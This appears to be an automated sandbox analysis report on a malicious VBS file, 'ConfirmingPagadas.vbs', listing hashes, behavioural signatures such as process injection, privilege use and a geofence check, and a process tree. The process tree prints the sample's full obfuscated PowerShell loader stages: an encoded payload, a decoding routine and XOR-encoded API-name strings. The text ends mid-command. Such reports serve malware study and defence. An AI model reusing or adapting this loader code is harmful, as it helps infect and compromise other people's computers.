Analysis
- max time kernel: 112s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 07-02-2023 14:34
Static task: static1
Behavioral task: behavioral1
- Sample: ConfirmingPagadas.vbs
- Resource: win7-20221111-en
Behavioral task: behavioral2
- Sample: ConfirmingPagadas.vbs
- Resource: win10v2004-20221111-en
General
- Target: ConfirmingPagadas.vbs
- Size: 347KB
- MD5: f11b79c769c9a90b99c94c67cb4f65ad
- SHA1: 6b240b312e2f82ed5153f6576e292149b5864e92
- SHA256: 371b09b2c178417073fe144d59c489dd2aa6dcf857f2c79bc289b88e2be690bd
- SHA512: 84a808c49434903f710bbe6617cf92c7bcb0f90e387c06b03cdbdc16e369b62bf9e32355ad3da8a6175e694e1b82cb204c181b831ddda255b3b0ab22ba542a5c
- SSDEEP: 6144:Z9q7eWOWb153bxobtFhLduPYQSGFkqzPHpx4H8hp9:fqTlD3lobhLdWN9TnC8b9
Malware Config
Signatures
- Blocklisted process makes network request (1 IoCs)
  Processes (flow, pid, process):
    flow 3, pid 872, WScript.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description, ioc, process):
    Key value queried: \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes (pid, process):
    pid 3160, powershell.exe
    pid 3160, powershell.exe
    pid 4892, powershell.exe
    pid 4892, powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, pid, process):
    Token: SeDebugPrivilege, pid 3160, powershell.exe
    Token: SeDebugPrivilege, pid 4892, powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes (description, pid, process, target pid, target process):
    PID 872 WScript.exe wrote to memory of 3160 powershell.exe
    PID 872 WScript.exe wrote to memory of 3160 powershell.exe
    PID 3160 powershell.exe wrote to memory of 4892 powershell.exe
    PID 3160 powershell.exe wrote to memory of 4892 powershell.exe
    PID 3160 powershell.exe wrote to memory of 4892 powershell.exe
Processes
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ConfirmingPagadas.vbs"
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Mosters = """ToFBruStnEmcTitHaiBloSknSa SaAFdlFliHepGieFrdEy0my un{Su Ry De on PapCeaForMaaSlmRe(Af[PaSRttFdrAniMonYlgtr]Fo`$AcJBeaBimFamVoeFarBikWelPraUlgVieSarEsnPieAsspa)Fo;mi Lo Sk Ov Sc`$PeMKaaRanPrnMoeDirTilAneTrsprsOk Th=Ti StNtreRewTu-ThOprbRujkeeMicSttUn FdbStyDotzoeRo[Ag]Un Kh(En`$WaJFaaKlmApmAfeEnrIrkBulCraKagDeeBarPenToeOpsBr.AiLFrePinRegSutInhUn af/Tr Be2Vi)Tr;Bd Br Ad Wa ReFSkoNorIn(Ti`$OvGUnerenboeTrrKaaBetSaiKooAfnDasCukUnoMinhufTretrrSkeDenRecTaeAurKenVoeFj=Un0Co;Te Sy`$ExGSkeAenKyeKarTaaTetBeiShodenovsKokReoBenUnfSpeEnrObeRanKucOvePrrSmnObeUn Tr-SilPetCr Tj`$EnJAdaScmBemBeeLdrBykKalKraUdgPreMarVenPieSesBe.ViLNdeErnNegCrtFuhPr;Fo Kr`$SiGUneManFlePurAlaSetUniFroObnPosVakSaoRenIdfCoeporCieClnGucHeeOprRanomeSp+Sk=Be2li)Fa{Fo le Ch`$TrOGlcUbuGllOviTenFiiBldMuaReeUr Ko=Ma Pr`$KoJEkaskmUnmEleNerAskDelFoaSlgLeeaprKanAneHespa.AfSExuAnbJusOvtInrPaiSwnGogOv(Va`$frGPheRnneneEnrZeaHotCoiBroFenTesBykKroYfnRaffoeCirExeAnnEsctreEnrGrnCaeVo,Ti Tr2Fo)Fo;Un Mo Kv Bl Ek Ja Be Mi Sa`$IdMReaThnSknNaeRyrPrlJaeSasGrsDe[Ri`$HvGBleUnnSkeWirluaKatFuiUnoeknUdshakDeoEnnSufpheAnrSkeEunChcBleRarDynNoeSg/Sv2sk]Pl Ur=Ad Go[incPooFanShvKweKarEftSu]Un:Li:SeTkloGeBpoyevtCheSu(sy`$DiOSccUauGnludiPunKoiRadViaSaeHj,St Ki1Ma6Hj)Ha;Gr Se sk`$CoMGraThnocntheSurExlUdeAfsDesKn[kv`$ChGvieImnBoeCurHoatatNeiTroVanSpsSmkFeoSunHefNieTvrEkeHanNaccyeTerTenReeFo/Im2Fi]Ar Sm=no In(Pe`$HyMBuaMinSenSheThrRilGneResEvsKe[Ra`$CyGDieTenigeSkrBoaOctAaibeoHanPlsudkKuoSanAufSaeunrPeeNonAbcUneSprDinraeSm/Ph2To]Fr Fi-FebVexKloTarSk El1Ki4Fe3lt)Bi;Kl Im An Hi Kv}Sa Ga[MiSNotSirCaiVanThgOp]Ne[SpSKayFrsMotDoebemVi.hoTReeUnxBetLu.slEsanNacHooAmdHjiPenSogAn]To:De:MoAreSRvCPaIReIWa.GuGNaeBatMaSPrtPrrLuiStnregHs(Sk`$SeMMoaDenVonHueKnrSolCoecasStsNa)Fr;Pr}Or`$MaSDipSoaVirLneHegPlrCoiMussh0Fa=maALylPaiRkpAfeuodKp0Br 
Ak'HoDSuCElFAr6EnFGiCDeFGuBKoEDeAOwESa2enAle1InEMoBDiEGr3StEGi3Un'Ra;Kn`$BeSAcpNeaOerAneIngAnrDuibosGu1Sk=GeAInlAfiLapHeetvdAr0Up Dr'GaCPo2VaETe6ScEQuCNeFMaDDiEMi0BuFSaCStEKv0AfEBo9ReFOpBPiAGl1FiDAl8BrEVi6reELi1InBUdCVoBTeDOpAXe1PuDstABaEBl1saFReCmiEBrEBeENa9grEFaAAzCMa1AfEYaEMeFJaBPhEUn6AkFPo9UdECoAAcCAf2TuEPrAHeFViBSuETr7NoEAl0ZaETrBDeFReCsa'At;Th`$AuSOupPaaBirLyeShgNorTeiTasCa2Ca=SiAStlMuiShpCiePrdLy0An No'SpCSo8ExEEpAUbFSpBBaDTrFCoFTrDSuEBa0ReEEkCAmCDrEGlEMiBHuEPrBFoFOuDUpELaALuFDeCStFEnCFe'Me;De`$soSSipSuaBarSaeBrgDurHiiWasja3In=BiASalsmiFlpSueHydSe0Ba Ek'GjDsuCEpFCl6GrFGeCReFGrBPoEPrAInEAl2TaAHy1meDUdDGrFPaACaEDe1InFJaBCoEDe6UnEPe2TaEFoAKuAMo1ReCMe6SnEIk1StFafBPeEDiASoFCrDPuEAn0OpFMoFMaDPaCHoEReAMyFbeDShFIm9MiERe6AfEPiCBaEBaARoFUdCSeAAk1KaCCo7MiEUaELaESa1LyEMaBAlERe3SkEBeABeDQuDInEguANoEFi9Ap'Ge;Ot`$NoSOvpLnaPlrJaeBigHarTuiAmsKu4Sa=GoAFrlSiiAmpLaeStdFi0St Cl'BeFCoCkaFVeBMiFReDBeESp6DiECl1EkEva8Tr'Im;Sk`$ZuSPrpScaPerplePegInrObiUdsSa5os=SyAFelSkiMipSteDedwa0pr pe'StCHi8skEBuATuFLoBInCPe2TrEHo0InENiBNoFKeANiEUn3RiETuAAgCmi7UnEQuEPlEFa1FrEetBImEPa3AnEItARa'Er;Op`$HeSMipPraInrUneAugOyrBoiTrsTe6Bu=AaApslBliSkpZoeNodSu0Pr Ho'HuDFaDFoDDiBViDBoCTaFSkFFoEFiAorESdCOvEDe6phEsuECiESa3MoCKa1LhEgrEJuEgi2ArELoAUdAFo3SeAAlFUnCTe7DaEab6ReEMiBMuETaANeCBrDocFLa6beDHoCFaERi6HaEPu8CoAPo3UdAorFAiDCuFAfFAbAStEByDNaEBy3ThEAn6DoEpaCBl'Va;Bo`$HoSvipFraHerAleUdgExrtaiCrsDo7Se=KoATvlCoisypReeOydFe0Hy no'SiDNiDnaFBiASwESe1HaFspBGsESk6KoEba2VaEPrAFjACh3PlAWaFLiCUn2MoECoELuERe1PaEunEBiEFl8AdEMyAChEMaBIn'Wh;Se`$SkSdipRuaMerNdeSigSurSuiSisFi8Vi=PrAsalliinopIdenedIn0hy Ho'DaDRyDTuEGaABaEFl9BeEpa3FnEJaANaEGrCChFUnBSkENaAToEUtBbeCTuBInEAgAziECh3ApEMiATeEFe8PeESaEOkFVeBClEPaAUr'Sm;Al`$DeSFipReaMirDieAmgInrPeiHossp9Be=FyAEnlUninopMieMudTe0Ve Sp'DrCNo6DiETr1EmCKl2DiEFeAPiEPd2BeEFr0CoFFeDSuFIs6KrCSt2CoEBe0WhEbaBRoFFoAGrEse3UnEKaANy'Un;To`$DoLSteStpFeuUrsSa0Am=AfABalTaiMapEceVedNa0Uh 
Ta'GrCAf2DoFSh6obCBaBPeEAfAStEKd3TrEbeAUnEHa8PhEMaEFaFLaBReEBaASuDSuBHeFfi6TaFTeFPlEUdAAd'cy;Hy`$UlLUneFjpNouHesMa1Fo=DiAAmlEkiInpMoeIldSh0Im Co'CaCReCUnECo3SeEReEapFslCnaFunCStAmo3seAEdFAnDBiFChFVaATrEBiDAnETv3SeEBo6EtEEvCTeALa3FoAphFAnDEmCduESkArhELeEmaEHa3TeEFoAPhETvBprARi3TrADoFgaCanEFeEBe1HjFAfCluEHa6EuCChCNoEAb3YoESjEStFDeCUdFYdCPnAMa3woATrFitCLuEytFUnAEdFLoBDiEMu0haCBaCtiEBi3AlEMaEShFAbCmiFAuCCu'Kl;Sl`$RoLIneDipPruefsIs2Un=GaASalMeiInpEkeNodDe0fo Cl'UnCSk6BlEsk1VeFBa9ArEpr0ArEFo4ArEhjAsa'Su;di`$ChLCheOvpGouTesIn3Ka=HeABelDyikopDieBadel0In Ch'PeDKoFTlFMaAMaEUnDVeEOv3ZiEOs6BrElaCRyAKn3biALiFPeCMe7MrEJe6LaEMaBLrEStAnuCQuDnoFFl6ClDScCSvEBy6ChETa8elASe3InAUnFSkCFo1NoEreASaFRh8MaDGrCUnERe3FoEDa0BlFStBUbASy3SpAHyFFaDEk9ooEOx6MeFBiDSkFEmBAgFWeABrEBiEPuEye3Ph'Re;Op`$FeLSpephpRuuTusFy4Bu=StASplPliVapWoeUddIn0Ko Sp'StDBl9SpEKi6FrFUdDMaFSaBsnFOvADoEUnESlEHy3AkCSpEanEMu3LiEst3KlESk0viEEcCAl'Fi;An`$trLTheDipBluLosCo5Ot=SeAunlCaiMepSbeCydGa0Tj St'PaEDo1StFenBKoEGrBCoEUn3UsEAd3Fe'Un;Im`$anLFeeTopOpuAbsSa6Bl=SkAOclSaiBypEqeTldHo0Be De'StCAa1WoFWiBPrDCoFByFUdDMiEDm0SpFSyBCoEunAunEBeCfoFUnBAfDci9AiERe6HuFUnDObFPoBTuFKrAEpEPrEVeESu3EbCPe2InEAaABaEPe2StEAm0MaFCoDDaFKa6Ma'He;sm`$SkLexeBlpAlubesSt7Me=EpAGelGoiStpSpeWrdPl0Ko Sm'TrCSm6TiCPaAAfDmy7Li'No;Sa`$VaLTaeInpDeuStsFu8An=ToAStlBoiSypQuePhdLa0Ku Ka'CoDFo3Ho'Ma;Af`$PiRSiePigCorGoeCatTetAueSnrovsFe=PiAArlEaiEupJaeRedKl0Fa St'MaDthAteDFrCEnCMeAOcDSkDAlBPeCTrBTeDDo'Ta;Ta`$BoaApfTirFliPacpaaCrnPniFosGltPi=SaADiluniCopJeepadRe0Ko Re'EvCKlCSkETyEsgEBi3DyEEl3DiDRa8ReESu6VeERu1BlEKuBCoEUp0RuFKa8MyDAgFHjFAqDInEMo0CoEReCMaCNoESk'En;EmfCouCunFrcCotBniWioSanMu InfSkkKrpDa Cr{EmPBaaMirHaaObmne Fa(Bu`$KnBdaeMidLalZoaFertj,Na Sl`$TrCCoaSktHeoStnAfiUncbeaMelirlAnySt)En Si sm un Gr Zi;Ur`$CorVieBolAnaBixSyiSlnDigDo0Un ut=NaAKilFoiTrpVeeUndSh0Sa Gu'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'Re;St&Un(Je`$MaLOmeTopScuCosSk7Sa)Sa Ba`$GarHaeStlHyaBexHoiTonFogdy0Ek;Fa`$MorKaeAflHaagaxReiSenSlgZo5Ko As=Ta SlAMalLaiAcpAueAndDo0be 
Di'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'St;Ma&Ra(Ly`$KoLSeeRapAcuAkshy7In)Ge Sk`$ForLoeTalMiaKlxAliHanGigti5Oc;Eb`$SarTreBalPeaKoxAkiHynEqgVi1Pr Ha=Br CrAJolJeiDepBreDedAc0Mu Wi'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'Wh;Tr&Gr(Te`$NoLBeeRipPruSmsNe7Ru)Ua Mi`$LyrOdeGolTeaFoxAeiUpnOvgUn1Ab;Su}CifTiujonBecDitAsiCioHunYm MiGReDWeTSt Sw{BePReaAlrApaJimGo Tu(Un[joPpaakorReaComOveTjtlueCorCa(RePCooLascliFatChiLaoPrnSe An=Ba ry0Al,ka UnMKuaBunshdDeaUntNooAqrPoyAm Bo=Ha Fu`$ryTDerPougaeSo)Mo]No To[elTBeyVopAgeQu[si]He]Pr Ca`$BnMKoePrdLeiHocSeiinnmbacolUnvBoaagrGoeDafCoaKobPlrHuiEskVekBeeTjrKl,Bl[UnPPaaRerGoademJoeOvtUneLerTe(LoPOpoVisSpiSctBriUnorenBe Ic=Bl Af1Ce)In]Am El[MeTYdySlpMeeGn]ta Un`$MaRFabdedDuiSogOv th=Pi hj[PaVTaoGeiJadPr]Vo)op;fo`$SprFreVilSuaVixAfiTrnFogMa2Pr Vo=Po PaALflspipspUneBldSe0Sk At'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'St;Co&Bo(Ba`$DaLjaeVapBuuCysBu7Po)Da Uo`$DirpieQulBiabrxSniBanTogSk2Pa;ob`$SprReeAflTraPrxHoiHynAbgHe3La Na=St PrAFolSaiMipMyeBldAl0Aw 
Tr'SuADeBCyDopDBeEYa6AfFSoBTiEBi0KuFNaDTiETi1TrEPeACoESi3PeEAb3PhEPrABrEGa1HoFWhCLrASa1OmCTeBCoEGeAEvEDe9HaELi6SiECa1ovEPaAGaCRaCAfEBe0SoEIn1FrFClCAnFMoBDiFArDPiFSkAUnEBoCSoFAsBTeEAn0LyFVaDDoASo7ChABrBSkDflCRoFTrFPhEBoEJiFSuDSkESwASvEEl8VeFEnDBuEIs6exFUnCUnBBe9VeAHa3OrAKoFSuDSm4SiDStCFoFHe6FrFPrCanFSvBWeEUnAOvEHy2asAFr1SwDLeDEkEInAKaEMi9DoEUn3CaEErAPaEGrCUdFTeBSaEPa6unETy0TaEma1SaABa1PiCHuCFoEDrEJeEFl3TeESk3FoETr6CoEAr1GuETo8VeCInCStEPe0OnEBe1HuFSa9piEFoAPiEMi1JaFKaBToERo6BaEEm0VaEMa1AyFHeCSlDOw2NoBSu5FuBAl5SaDSpCNoFLeBAuEStEMaEAs1NiEGaBvuEStEThFUdDMoEBaBRaAKv3MeAArFsuABeBNaCSu2ReEUnAHaEHiBXeERa6UnEPrCMeERe6VaENa1InEStEReEIm3BiFPe9UnEPiEUlFOmDImEReAInEYd9TrEkaELeEOcDHyFscDAnERa6KoEBi4EsEHa4KoEPaASnFPiDGaAPr6KoANy1KoDBeCSuENaAAdFboBFaCSa6HeEOp2CoFRyFFlEDe3RoECaAClESn2UdECaAGuEAr1KoFMeBUtELuEGeFkuBunEse6AlEBe0FoEFe1SpCSt9spEPo3BlEOsESyEWo8feFFiCsaAFl7SaAAnBFaDCoCArFNoFReEDoERgFSaDBlEBrAKnEGe8SoFAlDabEEg6DiFNoCenBNo8KoAIn6Dr'Un;Un&Ho(Fo`$StLDeePepPuuNisMe7Fr)Aa Ph`$berEreMilMtafexLiiSenDigSc3Ra;Co`$JurAxeRelBaaKnxPeiRenBugSn4cr Re=Po SaASnlAniBopReeHedAc0Te Or'BaAFoBDrDFlDReEUn6ScFdrBVaEBe0syFPhDCoECo1WhENiAStERe3ReEBr3EwEInAOdEot1HaFReCAnASi1BrCCeBCoELmAhyEbo9AmELu6syEBi1BeESiATrCVa2ReEBuABeFKoBMeECu7GrEba0ToEOpBOeASt7ReAFoBAbCBa3BeEKaAStFShFAcFDiAinFFlCStBLaDFlAMo3UnAmeFRyACoBArCBi3GlEInAInFStFaaFMiAVlFMuCLaBOrCHyADe3ExAdaFChATeBcrDPhDDiEPaDadELoBkrEHa6StEBr8HeASo3SnARlFSuASpBMeCHy2InEMiABiECnBBnETr6DiEnoCInESa6StEMa1KiEPoEHaEby3TuFTy9RaEPeEdoFFoDPeEKoAErEFr9FoEfdEDeECoDReFGeDMeETr6AfEMe4SkENo4MyEunAFaFScDBeATu6GaAFi1DuDEkCUpEPeAOrFTvBJeCWi6ClESg2FrFStFshEEd3OtELiAReERi2TrELeASkEJa1MaFQuBAnEFlEPrFfiBOrEpr6BoELi0DmEBa1MiCSk9SjESy3VeEBuEAnEUd8ReFCaCSwAAb7AkAMeBViDMuCbaFSmFFoEVoEUhFNeDBuEEnAUdESp8SpFGeDBrEIn6OsFStCMaBPe8ExAUn6St'De;An&An(Te`$taLIsePepSouShsDi7Um)Ac Ut`$UrrBueOvlnoafrxQuiRenLigSo4Ok;Bu`$OprCierelCaaafxEmiTenCagVr5Ta Du=Bo NoAFolaciBupMeeGadLe0Fe 
Ne'RoFUdDTeECaACoFKaBSlFgaAKoFPaDUsESa1NoABdFovAraBClDInDNeEEx6PoFChBChEBe0TeFItDDiEFr1EnEChAJuECe3SkEMi3SeERyAGaECo1coFMiCMoANi1MiCLeCGoFDeDOrESoAYaEAuEPeFThBLgEMaAcoDinBUnFBy6KuFFiFBoEViASkADe7SeAFa6Vu'ac;Am&Re(ko`$AnLUdeCrpFeuAssDi7er)Ra Wa`$LyrReeArlDuaArxOviSenPigNo5Fr Ab Mo Sa;Ho}Cu`$YnfSueGijNolReaUngBrtExiSlgCoeStsPo Pr=Im SaATrlHaiCrpSveUndan0Ap Ba'GuEPr4SmEMeASoFVeDKeEBe1UaELgASkEDr3JaBScCMoBreDFu'Et;Dr`$OlrMieDelTyakaxDriTynSkgSv6An No=Fl EmAMilZoicapDjeHodpy0Pi Cu'NeAzaBReDInASkEde7juEPr5DoFAkBUdESt6OvEGeBSoELiAUnEip3FuELa6SpESp8EtBViBUnBTr9KaAPlFSaBRa2EgATuFBaDOv4BlDJuCReFAp6MaFSuCCoFdiBcaEPeACoENa2GeANe1CoDArDBoFDiATrEPr1DiFTrBSkECl6adEdh2TaEfaAVoAva1CrCKo6SuECa1RrFAnBStEDiAScFGaDTrEVe0EnFmaFDoDPaCCoEIdAReFMiDCrFUn9CaEha6LuEFeCUnEUnASaFEmCMiALu1deCSp2AnECaELnFStDUnFBiCReEre7DaEPeELaETa3UfDAn2SjBMo5HaBFl5waCCo8NoESeANiFSoBfoCnoBPuEYdAUdETr3RaEExAAaEWa8StEAuEEkFsoBWaEBeATrCOv9JuETe0RoFCyDMaCYe9TiFYaAFoECe1UnEelCDiFNeBSuEKo6SeEKn0knEoo1SeDAlFDoELi0DrEpr6GeEFa1MoFInBDuEFaASmFsaDWaAMa7PaACl7KaEDi9AkEPe4CoFStFPoAIsFTrAUpBveEKo9BeERuATiEPa5BuEAl3BeEOpEfoEUd8KnFJiBKaEJe6GoEVa8ScEUsALiFdrCDeAGlFCyABaBUlCru3suEInAKoFIsFPrFUpAUdFBoCUeBAfBBaAMo6TuAHe3SkASaFPiAPr7OpCSy8WaCCoBMdDLaBbeALaFPiCDrFnoATh7ChDEr4AlCKn6BoEAk1BiFStBDiDAlFJuFIhBAaFMoDviDFi2flAmi3GuAStFSkDAb4PuDUlAScCSa6BoEBa1RdFChBArBAnCSkBExDUnDIl2ArADi3IdAVaFBaDBl4BeDSaAPcCAu6fiEVi1CoFCaBBrBByCafBHuDUaDRo2BlACl3DeASpFBeDBy4FaDSdAOvCMa6PhEPl1VaFFaBriBPiCudBToDMiDSa2CaAfa6BuASoFRhABk7TiDIn4CiCse6BlERy1BrFDaBDeDFaFAaFBeBKoFseDLvDVi2SkACy6BaAAn6ReAGa6Vr'Rn;Le&Un(In`$ToLbreAmpKauUnsDi7As)Fl Ry`$RdrSveRelNaaApxReiRonAbgGr6Xe;No`$DaSTehStaSpdSeuGafbi Re=De UnfOekDopqu Ud`$BoLbeeWipMouSlsIm5Ma sk`$KiLCoeTrpLouSvsUn6Di;Ho`$OmrNoeCulPraBexHiiFanFlgUn7Be af=Co HjASelbriYdpVaeLadCo0Un 
Pa'StAEtBSaCSk9DeEKaABeEVr3MyEBl3ApEUn6SaEmu1SiEUs8BeBHaCTrABrFTiBSm2SaACiFSeAFeBKrDChARoEAn7ArELi5CaFFiBGaEsp6syEOmBHaEUmABrESt3SkEHi6KoEMo8ElBAuBChBFj9BeAsa1AmCSe6TiEEr1GiFRe9KfEba0SmEPe4MeEMuAJuAKl7HuDOb4UnCPo6stESt1PlFStBDeDCiFSsFOuBEnFInDVoDRe2DrBUn5PiBFe5DeDTa5BeEbaAglFChDstESa0FoACa3ZaATrFFjBAb9ScBDeACoBVoAGaAAd3teASnFUnBUdFAnFap7CoBSeCVvBUfFBeBArFTiBPrFacASi3CaAStFJaBraFClFPo7SoBGeBCaBSpFSnAMu6Ba'Si;Tr&Le(Ju`$RiLIneYapDeuPrsCa7Ar)Ss Un`$OvrVieFalSjaIsxZoiRenBogMo7Bs;Ps`$ErrAueUnlStaeuxUdiconMugWr8Gi Ra=Pa ReALylInikrpSqeGodBr0To Tp'SyADiBOhDmoAEnEfiBArEUf3SiEAnEChEBe1FoEHeBraFLiCunFPeBSlFdaDSjESnEMiEHu9EnEBl6DeEFo4LuASpFbaBUn2AsAOpFKuAAyByiDOvACaEHa7BoEAm5SyFNoBOvEFi6BeEbrBAfEStARuECi3MoENo6VeELa8DiBFnBCoBNi9ImAUn1TjCFa6PaERh1BaFBe9siERe0UnEPa4SpEdaATuAEp7InDSi4EpCSt6TaEAt1SeFPoBNoDFjFCaFReBCoFCoDFlDUd2TeBHj5huBMa5SjDNo5AuEKaALaFHiDviEIn0KlAPi3SpASlFUdBCuCecBMo8SmBHaEDrBFoADeBEn7OmBAg6InBToESnBUnDUnAGr3StASkFImBBlFSpFCo7PaBInCBoBPsFLiBElFToBBrFJrASa3AfAUnFHeBSuFTiFSk7ScBPaBSlAAu6Pe'po;Un&In(Te`$SaLOpeSupHeuHesDe7Gu)Co Go`$KerBaePalRoaAtxTaiXenSogNo8Aa;by`$AlFudeBelBrlBeiApnSpgco0In0Pr=Fj'KrHOrKNoCFoURe:no\BiRPoeAufFaeLarBaeponNacAveInkBooPorSotAfeScnBreEx9Co0Go\SkLReyFokUkkGleNarVaiPadKrdMoeNarReeErnkosCu'Si;Un`$AnFRiePolKolDeiRinBigGy0Sp1Mi Me=LaALilUniSapToeJadFa0Me Sy'RoAViBSaFjaCFeFPlABiESe3ReFTeBLoEdrEtrEVe1TrEPrAAnFHiCdiFEnCDiBSi2BoARe7FaCCi8ChEInAChFMiBRvADe2DiCHa6FlFBsBGoEinASuEFj2HoDTrFLgFVaDOmETh0AfFCpFSaEPaATrFDrDMoFUnBSnFVa6ReARaFMeASe2ThDsiFDeEOuEPyFElBUnEIn7BeASpFfoAToBKoCPe9SaECaAPeEGe3MoESa3BiEJo6OpEPi1LdESc8SvBunFFeBReFreAPo6SuAAn1StFkiBBrEcaEGuEGe3DyESkABeEGa0SvFtiDKoEPa8SkEspEMiEMi1PrEMiAPhFKrDKr'Re;Ri&Li(sa`$BeLPeePepMeuStsKn7Pr)Pa Re`$ArFAfeExlSilSkiGynSvgla0Sj1la;Br`$InrNeeSllplaMaxHyivanNogko9De Sm=Kr PrAHylGriDipCoeArdDe0la 
Ro'VeAPsBMiFArDalECaAHeEUd3FoEAnEUnFKl7SoEGa6OaENa1QuEAf8MoAFyFUeBin2BoAReFPrDFr4InDOrCUnFBr6MoFAmCAkFTjBdaESaAfaEHa2PlAAd1RoCArCQuEba0FoESt1FiFTa9InEGiAAgFkaDHkFOvBTrDPh2NeBFo5UnBko5ArCsm9BuFUnDSaENo0UdEHn2ArCToDReEStEGeFFeCAlEPoANiBbe9prBStBmaDNoCPaFDeBGoFUbDWoERo6OpEPi1TiEMi8PrAWh7poASiBAnFTiCLmFPoAUnEFr3FoFNyBGeEacEOpEMa1SlEMiAToFDaCOvFStCLbAIn6sp'Fo;Ma&Af(Re`$UpLDeeEdpOvuUnsSu7Ls)Nu Mu`$RerHyeOplfeaAnxBiiAfnCogHi9Zu;Ec`$ScsRruAnlSctSkaEmnMieResopsci0So Na=De TaAFilViimipPoeHudli0ac Co'DeDDe4AdDGeCSuFIn6FaFEfCSkFGrBSuEJoABaEIn2paAUd1PaDInDWaFFoAlaEAu1AuFTiBBaEUn6ReEDe2CaEOrAFoAgr1KeCPr6MiEUg1BoFadBBeEAfASpFHaDStEDe0ChFLaFBrDThCNoELuAReFolDGaFTe9EfEco6KnETeCGlEOvAMaFfaCSkASo1PaCLu2ExETeEamFReDFoFLiCTiELe7FaEEnEorEBl3RuDra2DiBBa5InBFe5AnCHeCKlEUd0KiFSlFGeFPr6VaAav7OnADaBDeFBeDPaEdeAJaEOu3OcESaEGeFVa7InEch6ChEre1CuEUn8InAZo3grAPrFLlBHaFImAMi3HjAUnFShACoFArAHaBZoCHo9ChEobAKrESe3TrEAl3PeEUn6SeEUf1LaEUm8TaBScCDaAHm3StAAnFDoBGo9RnBInASpBasAafARe6El'Ba;Au&Re(Lr`$RiLPaefipMouFusYt7di)Ko un`$TasSeuDelFotSaaNrndievasSusIc0Fu;Tn`$SiIUonPrdBueOvmBinBriJafPiiLecAfaBatDeiKuoPinBosTo7Tr7Mo=Me`$ParjoeLylToaLixPniHenHygHy.RacTooReuFinTotPu-Ar6Dr5Fo5Le;Su`$AfsWeuPelEntSyatrnAueDrshvsMe1Sh Im=Pe ToATalCaiUlpSpetrdUn0sp Ch'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'Ci;Tr&Gr(Ca`$AlLEbebupHauElsOx7So)Po Un`$SisTruEnluntNoaPrnReeSusHosIn1Do;Fo`$UdsEtuRulMotBoaAdnKoeBosEcsTe2Ma Ge=Cr FoAdrlMaiGopMoeEldTe0De Me'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'ha;Ch&Ho(Pe`$UdLHeeblpHjuGlsHe7Im)re Ta`$TesSluVrlOvttraStnVeeUnsPusLu2Gi;No`$UdsacuAvlShtAgaDenHoecisBlsEf3Le An=Dp MeAUdlBaiSqpObeprdAn0Na 
cl'GaACuBSvCPu3WhEStEWhFOmDMaEStBKnESpAFrFApDtiESvAKoETh3FiEBe3GaEMe6HyFSuBSeEDiAToAPh1maCFe6ReETe1KaFSp9poEVr0InEFa4DaEInAteAPr7NeABeBAsCTi9PaEMeAToECh3GoEto3MaEOv6KaESt1FoEUn8QuBDkCuvAFl3OwAPrBBeDurAViEBeBImEGl3BeEVeEDeEPe1BuEPrBUdFPaCUnFTeBJeFHuDChESkEPrEAr9PlEMu6SsEDr4InALb3CrAKiBStDPaCDeESe7AfEAnEInEAfBSpFavASuEDe9TrABa3StBwaFPrASa3HeBReFCuAOx6Re'As;Br&Ud(Pa`$PuLToeDopViuBosLs7Cm)Un Sp`$HusMauOxlUntChaSynMaeMisAbsFo3Te#Tr;""";;Function sultaness9 { param([String]$Jammerklagernes); For($Generationskonferencerne=2; $Generationskonferencerne -lt $Jammerklagernes.Length-1; $Generationskonferencerne+=(2+1)){ $Aliped = $Aliped + $Jammerklagernes.Substring($Generationskonferencerne, 1); } $Aliped;}$Guidelines0 = sultaness9 'St Lo An Ko Ti Gr Gn An Ti Co Yd So Di ge Wo Sa fo Tr Su St Ny Sw La FoIgrELiXPa ';$Guidelines1= sultaness9 $Mosters;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Guidelines1 ;}else{.$Guidelines0 $Guidelines1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Aliped0 { param([String]$Jammerklagernes); $Mannerless = New-Object byte[] ($Jammerklagernes.Length / 2); For($Generationskonferencerne=0; $Generationskonferencerne -lt $Jammerklagernes.Length; $Generationskonferencerne+=2){ $Oculinidae = $Jammerklagernes.Substring($Generationskonferencerne, 2); $Mannerless[$Generationskonferencerne/2] = [convert]::ToByte($Oculinidae, 16); $Mannerless[$Generationskonferencerne/2] = ($Mannerless[$Generationskonferencerne/2] -bxor 143); } [String][System.Text.Encoding]::ASCII.GetString($Mannerless);}$Sparegris0=Aliped0 'DCF6FCFBEAE2A1EBE3E3';$Sparegris1=Aliped0 'C2E6ECFDE0FCE0E9FBA1D8E6E1BCBDA1DAE1FCEEE9EAC1EEFBE6F9EAC2EAFBE7E0EBFC';$Sparegris2=Aliped0 'C8EAFBDFFDE0ECCEEBEBFDEAFCFC';$Sparegris3=Aliped0 'DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C7EEE1EBE3EADDEAE9';$Sparegris4=Aliped0 'FCFBFDE6E1E8';$Sparegris5=Aliped0 'C8EAFBC2E0EBFAE3EAC7EEE1EBE3EA';$Sparegris6=Aliped0 'DDDBDCFFEAECE6EEE3C1EEE2EAA3AFC7E6EBEACDF6DCE6E8A3AFDFFAEDE3E6EC';$Sparegris7=Aliped0 'DDFAE1FBE6E2EAA3AFC2EEE1EEE8EAEB';$Sparegris8=Aliped0 